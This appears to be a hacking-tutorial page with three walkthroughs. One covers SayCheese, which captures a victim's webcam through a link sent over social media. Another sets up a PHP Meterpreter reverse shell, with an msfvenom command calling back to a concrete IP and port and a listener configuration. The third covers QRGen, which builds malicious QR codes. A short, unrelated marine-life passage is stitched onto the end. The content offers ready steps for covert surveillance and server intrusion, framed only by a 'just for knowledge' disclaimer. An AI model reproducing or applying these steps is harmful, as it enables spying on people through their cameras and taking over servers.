Hack Victim’s WebCam With a Link

Take Webcam Shots From Target Just Sending a Malicious Link

SayCheese is Tool Coded By The Linux Choice The tool generates a malicious HTTPS page using Serveo or Ngrok Port Forwarding methods, and a javascript code to cam requests using MediaDevices.getUserMedia.

How it works?
The tool generates a malicious HTTPS page using Serveo or Ngrok Port Forwarding methods, and a javascript code to cam requests using MediaDevices.getUserMedia.

The MediaDevices.getUserMedia() method prompts the user for permission to use a media input which produces a MediaStream with tracks containing the requested types of media. That stream can include, for example, a video track (produced by either a hardware or virtual video source such as a camera, video recording device, screen sharing service, and so forth), an audio track (similarly, produced by a physical or virtual audio source like a microphone, A/D converter, or the like), and possibly other track types.


Steps to Download and Install SayCheese

This script is available for both Linux and Windows. You can check the official repository of PhoneSploit here

Step 1 Execute the following command to clone the SayCheese repository into your Linux Or Download SayCheese

git clone https://github.com/thelinuxchoice/saycheese

Step 2 Go to SayCheese repository using cd command

cd saycheese

Step 3 Now We have to grant the permission to the saycheese.sh file by typing this following command

chmod +x saycheese.sh 

after executing all command successfully we can use our tool.
Steps to  use SayCheese

Setp 1 Now we just have to type the final command put this cmd into your command for executing SayChees

bash saycheese.sh 

Now you can see our tool is ready to use

As you can see you have two option Serveo.net or ngrok both services are used for port forwarding  you can use ngrok or serveo according to you hear I'm going to using ngrok

Step 2 For use ngrok service press 2 
now wait till downloding ngrok or wait for starting ngrok or php service



after Everything is done Successfully you get a link as you can see

Step 3 You can send this link over Whatsapp or Facebook or Gmail This will Work Fine.. if Your Victim Open’s it and give the permission to the camera

hear i'm opening this link into my phone and allow to camera that's it

When target opens our link you can see victim IP address as well as you can see SayCheese Start capturing shots and receiving file .



The Image File Will be Automatically Saved here in this folder ( SayCheese Folder )



That's Done you can see Camera received Files

 

Create PHP Backdoor Of Metasploit

we going to teach you how to manually create a PHP backdoor for Metasploit and then how to exploit it 

How it works?
php-reverse-shell. This tool is designed for those situations during a pentest where you have upload access to a webserver that's running PHP. ... It differs from web form-based shell which allows you to send a single command, then returns you the output.



Creating reverse shells using php scripts is generally quite easy and can be accomplished with just a small php and a program like netcat. Netcat would run as a listener (a socket server actually) and the php script has to be run on the victim server so that it connects back.
In this example we are going to create reverse shells in php using metasploit. Yes, its too big a tool for such a small task but looks cool anyway.
To brief up the basics about reverse shells remember that it has 2 components. First is the listener on local/hacker system that waits for incoming connections, and the second is the payload script/program that runs on target computer and is configured to connect to the listener and offer a shell.

 listener (hacker machine) ++--- reverse shell payload (victim machine)

Once the listener is connected, it can gets a shell which can be used to run any command (limited to the user privilege) on the target system.

Lets Start 

Task 1 Creating PHP Payload 

So the first step is to create our payload program. This is done using the msfpayload command and looks like this

msfvenom -p php/meterpreter/reverse_tcp LHOST=3.21.94.26 LPORT=1337 R > exploit.php

The above command would create a file called exploit.php which is the reverse shell payload. It is just a plain php script that is configured according to the LHOST and LPORT parameters.

or
You can create or configure file Manually using this script → Download script

 Note:- Here I'm using static public IP in your environment you have to port forward if don't have static IP
Now upload the exploit.php to the target system.

Task 2 Starting listener

Once the payload is uploaded, the next thing to do is to start our listener which will catch the incoming connection offer.

Step 1:- Start msfconsole and run the following commands

msfconsole

Step 2:-  Use multi/handler using following command

use exploit/multi/handler

Step 3:- set payload Type following command

set payload php/meterpreter/reverse_tcp 

Step 4:- set localhost (here is your machine address)

set lhost 3.21.94.26 

Step 5:- set local port number

set lport 1337

Step 6:- start listener using following command

exploit

Now the listener is ready. Now its time to run the php script on the server. Its uploaded, and now can be run by opening from the browser like a normal url.
http://targetmachine/some/path/exploit.php

http://targetmachine/some/path/exploit.php

As soon as the script starts running, msfconsole will indicate connection and meterpreter session would come upNow that meterpreter is up, its time to play with the system.

__________________________

Happy Hacking! (Please do not spam it, It's Just For Knowledge ...)

 

Malicious QR Code with QRGen

QRGen comes with a built-in library that contains lots of popular exploits, which is extremely useful if you have time to sit down with the same device you're looking to exploit and find out which one works. For a penetration tester looking to audit anything that uses a QR code scanner, merely buying the same scanner and running through the exploits can lead you to get the scanner to behave in unexpected ways. The categories of payloads available on QRGen can be accessed by using the -l flag and a number while running the script. The number and payload type are listed below.

• Command Injection

• Format String

• String Fuzzing

• SQL Injection

• Directory Traversal

• LFI

• XSS

• watch video

• 
  
  

• Install QRGen

  To start with QRGen, we'll need to download the repository from GitHub do perform the command below in a terminal window.

  git clone https://github.com/h0nus/QRGen
  cd QRGen
  pip3 install -r requirements.txt

  Generate Malicious QR Codes from a Payload Type

  After installing the packing, you can run the script by typing python3 qrgen.py as following −

  

  To start, let's create a payload containing format string payloads. To do so, run QRGen with the following argument.

  

  Finally, a series of QR codes will be generated, and the last one that was created will open automatically.

  

MARINE LIFE -COASTECHWITHBIO

MARINE LIFE         BY        COASTECHWITHBIO

Our ocean, coasts, and estuaries are home to diverse living things. These organisms take many forms, from the tiniest single-celled plankton to the largest animal on Earth, the blue whale. Understanding the life cycles, habits, habitats, and inter-relationships of marine life contributes to our understanding of the planet as a whole. Human influences and reliance on these species, as well as changing environmental conditions, will determine the future health of these marine inhabitants. Toxic spills, oxygen-depleted dead zones, marine debris, increasing ocean temperatures, overfishing, and shoreline development are daily threats to marine life. Part of NOAA's mission is to help protect these organisms and their habitats.